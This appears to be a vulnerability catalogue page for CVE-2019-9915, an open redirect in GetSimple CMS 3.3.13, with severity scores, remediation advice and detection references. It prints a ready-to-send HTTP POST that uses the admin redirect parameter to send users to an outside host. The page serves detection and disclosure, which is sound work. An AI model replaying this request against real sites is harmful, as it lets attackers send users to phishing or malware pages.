🔙 목록으로 돌아가기

CVE-2019-9915: GetSimple CMS 3.3.13 - Open Redirect

TitleGetSimple CMS 3.3.13 - Open Redirect
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
RemediationUpgrade to the latest version of GetSimple CMS to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.08964
CVE IDCVE-2019-9915
CWE IDCWE-601
Tags cve cve2019 redirect getsimple cms get-simple. vuln

🔍 Vulnerability Description

GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

userid=KJVGeX&pwd=VIe8cn&submitted=Login

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9915.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9915.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A